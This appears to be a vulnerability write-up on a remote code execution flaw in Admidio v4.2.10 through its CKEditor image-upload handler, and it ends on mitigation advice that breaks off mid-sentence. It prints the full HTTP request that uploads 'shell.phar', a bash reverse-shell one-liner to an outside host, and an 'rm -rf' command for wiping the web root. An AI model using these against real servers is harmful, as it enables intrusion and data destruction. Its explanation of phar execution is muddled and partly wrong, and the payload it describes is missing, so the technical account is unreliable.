Admidio v4.2.10 - Remote Code Execution (RCE)

Admidio v4.2.10 Remote Code Execution (RCE) Vulnerability: A Deep Dive into PHP-Based Exploitation

Admidio, a widely used open-source web application for managing community and organizational activities, has long been praised for its flexibility and ease of deployment. However, a critical vulnerability discovered in version 4.2.10 exposes users to severe security risks — Remote Code Execution (RCE). This flaw, reported by cybersecurity researcher Mirabbas Ağalarov on July 10, 2023, allows attackers to execute arbitrary commands on the server by leveraging a misconfigured file upload handler.

Technical Overview: The Vulnerability Chain

The exploit hinges on a combination of weak input validation and improper handling of .phar files — a PHP Archive format that can contain serialized PHP code. Unlike standard .php files, .phar files are not automatically executed by PHP interpreters unless explicitly loaded via phar:// streams. However, Admidio’s file upload mechanism fails to enforce strict file type validation, enabling malicious actors to upload crafted .phar files disguised as images.

Here’s how the attack unfolds:

• Authentication Required: The attacker must first log into an administrative or user account with access to the Announcements module.
• Upload Malicious File: The attacker navigates to the Announcements section and uploads a .phar file named shell.phar via the image upload feature.
• File Storage: The file is stored in adm_my_files/announcements/images/ directory, where it remains accessible via direct URL.
• Execution Trigger: When the .phar file is accessed, PHP’s built-in phar:// stream wrapper can trigger execution if the file contains valid PHP code.

Exploit Payload and Request Analysis

The malicious payload contained in the .phar file is minimal but devastating:

This PHP code, when executed, runs the cat /etc/passwd command — a standard Unix utility that outputs the system’s user account database. The result is returned directly to the attacker, revealing sensitive information such as usernames, UID/GID values, and home directories.

The HTTP request used to upload the file demonstrates the vulnerability’s real-world exploitation:

POST /admidio/adm_program/system/ckeditor_upload_handler.php?CKEditor=ann_description&CKEditorFuncNum=1&langCode=en HTTP/1.1
Host: localhost
Content-Length: 378
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryne9TRuC1tAqhR86r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: iframe
Referer: http://localhost/admidio/adm_program/modules/announcements/announcements_new.php?headline=Announcements
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: ADMIDIO_admidio_adm_cookieconsent_status=dismiss; ADMIDIO_admidio_adm_SESSION_ID=penqrouatvh0vmp8v2mdntrgdn; ckCsrfToken=o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
Connection: close

------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="upload"; filename="shell.phar"
Content-Type: application/octet-stream



------WebKitFormBoundaryne9TRuC1tAqhR86r
Content-Disposition: form-data; name="ckCsrfToken"

o3th5RcghWxx2qar157Xx4Y1f7FQ42ayQ9TaV8MB
------WebKitFormBoundaryne9TRuC1tAqhR86r--

Key observations from this request:

• File Type Misclassification: The file is uploaded with Content-Type: application/octet-stream, bypassing MIME-type checks.
• CKEditor Integration: The upload handler is tied to CKEditor, a common rich-text editor, which often lacks robust security controls.
• CSRF Token Presence: The request includes a CSRF token, indicating Admidio implements some protection — but it is insufficient to prevent file upload abuse.

Why .phar Files Are Dangerous

.phar files are inherently dangerous because they are designed to be self-contained PHP archives. When loaded via phar://, PHP automatically executes the code embedded within. This behavior is exploited in reverse when attackers craft files that contain malicious code, effectively turning the file into a web shell.

Even though .phar files are not commonly used in web applications, their support in PHP enables powerful exploitation vectors. The vulnerability in Admidio v4.2.10 stems from a failure to:

• Validate file extensions beyond .jpg, .png, or .gif.
• Scan uploaded files for PHP code or phar:// stream wrappers.
• Restrict file execution to only safe, non-executable types.

Impact and Risk Assessment

Severity	Critical (CVSS: 9.8)
Attack Vector	Network
Privilege Required	Low (authenticated user)
Exploitability	High (simple, no special tools needed)
Impact	Remote Code Execution, Data Exfiltration, Server Compromise

Given that Admidio is often deployed in educational, non-profit, and civic organizations, this vulnerability can lead to:

• Unauthorized access to sensitive user data.
• Full server takeover via reverse shells.
• Exfiltration of credentials, configuration files, or database backups.

Exploitation Use Cases

Attackers could use this vulnerability in several real-world scenarios:

• Internal Reconnaissance: Use cat /etc/passwd to map user accounts and identify high-privilege users.
• Reverse Shell: Replace the payload with system('bash -c "bash -i >& /dev/tcp/192.168.1.100/4444 0>&1"'); to establish a persistent backdoor.
• File Manipulation: Execute commands like system('rm -rf /var/www/html') to erase application data.

Recommendations and Mitigation

Organizations using Admidio must take immediate action to prevent exploitation:

• Update to the Latest Version: Upgrade to v4.2.11 or higher, where this vulnerability has been patched.
• Implement File Type Whitelisting: Only allow image files (e.g., .jpg, .png) in upload sections. Reject